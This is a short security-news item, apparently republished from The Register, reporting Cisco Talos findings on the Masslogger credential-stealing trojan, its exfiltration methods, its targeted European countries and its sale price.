Security News > 2021 > February > Cred-stealing trojan harvests logins from Chromium browsers, Outlook and more, warns Cisco Talos

Cisco Talos has uncovered a credential-stealing trojan that lifts your login details from the Chrome browser, Microsoft's Outlook and instant messengers.

Cisco Talos added: "Masslogger is a credential stealer and keylogger with the ability to exfiltrate data through SMTP, FTP or HTTP protocols. For the first two, no additional server-side components are required, while the exfiltration over HTTP is done through the Masslogger control panel web application."

The second stage of the infection is a PowerShell script, a common technique, that loads the main Masslogger loader from compromised legitimate hosts as a.jpg file.

Talos said the malicious folk behind Masslogger were mostly targeting southern and eastern European countries: "Based on the combination of discovered emails and file names, we believe it was targeting organizations in Turkey, Latvia and Italy. We have observed similar campaigns happening in several instances before, starting no later than September 2020. In previous campaigns, the actor was targeting users in Bulgaria, Lithuania, Hungary, Estonia, Romania and Spain."

Masslogger is not an entirely new creation of the malware industry: Talos pointed to previous research by infosec chap Fred HK. He attributed it to a malware underground persona who goes by the handle of NYANxCAT. Prices for Masslogger were apparently $30 for three months or $50 for a lifetime licence.

Cisco's analysis showed that Masslogger "Is almost entirely executed and present only in memory" with just the email attachment and the HTML help file.

News URL

https://go.theregister.com/feed/www.theregister.com/2021/02/18/masslogger_cisco_talos_research/